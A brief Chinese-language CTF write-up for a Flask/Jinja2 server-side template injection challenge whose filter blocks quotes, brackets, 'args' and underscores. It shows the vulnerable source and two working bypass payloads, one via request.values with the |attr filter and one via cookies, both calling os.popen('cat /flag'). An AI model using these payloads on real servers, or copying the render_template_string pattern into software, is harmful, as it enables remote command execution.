Werkzeug/1.0.1Python/3.8.7
看源码EXP    
/?name={{lipsum|attr(request.values.a)|attr(request.values.b)(request.values.c)|attr(request.values.d)(request.values.tari)|attr(request.values.f)()}}&tari=cat%20/flag&a=__globals__&b=__getitem__&c=os&d=popen&f=read

源码
from flask import Flaskfrom flask import requestfrom flask import render_template_stringimport reapp = Flask(__name__)@app.route('/')def app_index():name = request.args.get('name')if name:if re.search(r"\'|\"|args|\[|\_",name,re.I):return ':('template = '''{%% block body %%}<div class="center-content error"><h1>Hello</h1><h3>%s</h3></div>{%% endblock %%}''' % (request.args.get('name'))return render_template_string(template)if __name__=="__main__":app.run(host='0.0.0.0',port=80)
web365 基础上多过滤了 _ 。
思路类似于前面利用 GET 参数来替换,EXP 有个比较陌生的 |attr,参考官方文档可知
https://jinja.palletsprojects.com/en/2.11.x/templates/#attr
Get an attribute of an object.
foo|attr("bar")works likefoo.barjust that always an attribute is returned and items are not looked up.
即 foo|attr("bar") 等价于 foo.bar,可以完美通过字符串获取属性。
因为无法使用下划线,即 __globals__.xxx,所以换成 |attr(request.values.a)|attr(request.values.b) 形式。
其他解法,Cookie传参
/?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
